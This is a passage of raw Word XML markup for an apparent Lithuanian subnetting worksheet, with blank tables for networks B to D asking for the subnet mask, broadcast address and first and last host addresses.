            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="7FE3EB20" w14:textId="77777777" w:rsidTr="009D5F8C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1971" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="64CEE81D" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Tinklo kaukės IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3029" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="70AB8A42" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="7051E4F3" w14:textId="77777777" w:rsidTr="009D5F8C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1971" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="65C03338" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Broadcast IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3029" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="1979CA48" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="53304808" w14:textId="77777777" w:rsidTr="009D5F8C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1971" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="10C93258" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Pirmas Host IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3029" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="119D1B62" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w14:paraId="1A11A18E" w14:textId="77777777" w:rsidTr="009D5F8C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1971" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7E48350B" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Paskutinis Host IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3029" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="3327D48B" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="316F7BE2" w14:textId="40AD2A71" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3907"/>
        <w:gridCol w:w="6004"/>
      </w:tblGrid>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="4DF4B9DC" w14:textId="77777777" w:rsidTr="009D5F8C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="pct"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="1CF068E4" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Tinklas B</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="14F9300C" w14:textId="77777777" w:rsidTr="009D5F8C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1971" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="408B0E41" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Tinklo IP/prefiksas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3029" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="31AEAB95" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="1A848E2E" w14:textId="77777777" w:rsidTr="009D5F8C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1971" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="36B509B0" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Tinklo kaukės IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3029" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="5A4169CC" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="4E4350D8" w14:textId="77777777" w:rsidTr="009D5F8C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1971" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6A4F30BB" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Broadcast IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3029" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="7B0D74B5" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="0F104428" w14:textId="77777777" w:rsidTr="009D5F8C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1971" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="07814983" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Pirmas Host IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3029" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="05EDCE4E" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w14:paraId="7C3C18B7" w14:textId="77777777" w:rsidTr="009D5F8C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1971" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7E136062" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Paskutinis Host IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3029" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="48659619" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="288D2A4E" w14:textId="40AD2A71" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3907"/>
        <w:gridCol w:w="6004"/>
      </w:tblGrid>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="78F352D0" w14:textId="77777777" w:rsidTr="009D5F8C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="pct"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="4A9CB5B2" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Tinklas C</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="3023979C" w14:textId="77777777" w:rsidTr="009D5F8C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1971" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="29BCFE02" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Tinklo IP/prefiksas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3029" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="526963B9" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="37910289" w14:textId="77777777" w:rsidTr="009D5F8C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1971" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="607C089F" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Tinklo kaukės IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3029" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="1163AA82" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="0D5D1F61" w14:textId="77777777" w:rsidTr="009D5F8C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1971" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="511B1C48" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Broadcast IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3029" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="1818E02F" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="475B6E96" w14:textId="77777777" w:rsidTr="009D5F8C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1971" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="48897779" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Pirmas Host IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3029" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="5CB92F60" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w14:paraId="27E2D5B7" w14:textId="77777777" w:rsidTr="009D5F8C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1971" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="19AE3BDF" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Paskutinis Host IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3029" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="4C3BA983" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="442DA020" w14:textId="40AD2A71" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3907"/>
        <w:gridCol w:w="6004"/>
      </w:tblGrid>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="27FAC0C1" w14:textId="77777777" w:rsidTr="009D5F8C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="pct"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="2564D2E1" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Tinklas D</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="67E2FCE6" w14:textId="77777777" w:rsidTr="009D5F8C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1971" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="59C17CBC" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Tinklo IP/prefiksas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3029" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6EDB2338" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="2726D630" w14:textId="77777777" w:rsidTr="009D5F8C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1971" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0A0CF094" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Tinklo kaukės IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3029" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="2D761C42" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="23C3FF8F" w14:textId="77777777" w:rsidTr="009D5F8C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1971" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="17F3AA7C" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Broadcast IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3029" w:type="pct"/>
